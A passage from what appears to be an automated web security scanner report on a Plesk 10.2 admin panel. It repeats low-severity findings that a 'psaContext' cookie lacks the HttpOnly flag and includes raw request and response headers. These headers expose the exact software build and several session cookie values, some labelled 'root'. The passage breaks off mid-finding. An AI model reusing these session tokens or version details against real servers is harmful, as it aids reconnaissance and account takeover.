HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 14:17:12 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:17:12 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=personal-info; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:17:12 GMT Server: sw-cp-server Content-Length: 28204
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.22. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/toolspreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/tools
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller/tools HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usage Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 15:27:17 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 15:27:17 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=reseller-tools; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 15:27:17 GMT Server: sw-cp-server Content-Length: 9049
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.23. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/tools/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller/tools/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:13:35 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:13:35 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=reseller-tools; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:13:36 GMT Server: sw-cp-server Content-Length: 9007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.24. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/tools/id/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller/tools/id/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; psaContext=dashboard; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:13:35 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:13:35 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=reseller-tools; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:13:36 GMT Server: sw-cp-server Content-Length: 9007
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.25. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/reseller/tools/id/3/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/reseller/tools/id/3/?context=reseller-tools HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=650d277c6582dd6296b0d447081dc10c; locale=en-US; psaContext=service-plans
Response
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 14:15:44 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:15:44 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=reseller-tools; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:15:44 GMT Server: sw-cp-server Content-Length: 9058
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.26. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/settingspreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/server/settings
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=settings; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/server/settings?context=settings HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=subscriptions
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:11:27 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:11:27 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=settings; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:11:28 GMT Server: sw-cp-server Content-Length: 13093
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.27. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/server/toolspreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/server/tools
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/server/tools?context=tools HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=settings
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:11:34 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:11:34 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=tools; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:11:35 GMT Server: sw-cp-server Content-Length: 14558
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.28. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/listpreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/subscription/list
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=subscriptions; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/subscription/list?context=subscriptions HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=domains
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:11:09 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:11:09 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=subscriptions; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:11:09 GMT Server: sw-cp-server Content-Length: 19549
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.29. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/subscription/list/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=subscriptions; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/subscription/list/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:16:00 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:16:01 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=subscriptions; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:16:01 GMT Server: sw-cp-server Content-Length: 19812
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.30. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/subscription/list/reset-search/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/subscription/list/reset-search/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=subscriptions; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/subscription/list/reset-search/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:16:00 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:16:01 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=subscriptions; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:16:01 GMT Server: sw-cp-server Content-Length: 19812
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.31. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/left.php3
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=dashboard; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /left.php3 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: psaContext=dashboard; PHPSESSID=b6e4a9281ca7faad89475e4d77b34296; locale=en-US
Response
HTTP/1.1 200 OK Last-Modified: Fri, 23 Sep 2011 18:34:33 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=dashboard; path=/ Date: Fri, 23 Sep 2011 18:34:33 GMT Server: sw-cp-server Content-Length: 18650
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
5.32. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/license.php3previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/license.php3
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=dashboard; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /license.php3 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=5df63162743aa01957d9088e3d5bb434; locale=en-US
Response
HTTP/1.1 200 OK Last-Modified: Fri, 23 Sep 2011 18:32:37 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=dashboard; path=/ Date: Fri, 23 Sep 2011 18:32:37 GMT Server: sw-cp-server Content-Length: 23854
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
5.33. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/login_up.php3
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /login_up.php3 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/create Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BarExpanded=True; PHPSESSID=e4155988e1f250b6a55cb24dea872fd0; locale=en-US; psaContext=customers
Response
HTTP/1.1 200 OK Last-Modified: Fri, 23 Sep 2011 19:19:18 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 X-Plesk: PSA-Key/PLSK016479390000 Set-Cookie: psaContext=customers; path=/ Date: Fri, 23 Sep 2011 19:19:18 GMT Server: sw-cp-server Content-Length: 5389
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
5.34. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-info/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/admin-info/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=personal-info; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/admin-info/?context=personal-info HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/top.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Fri, 23 Sep 2011 19:12:11 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=personal-info; path=/ Date: Fri, 23 Sep 2011 19:12:11 GMT Server: sw-cp-server Content-Length: 20512
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
5.35. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/admin-password/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/admin-password/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=credentials-info; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
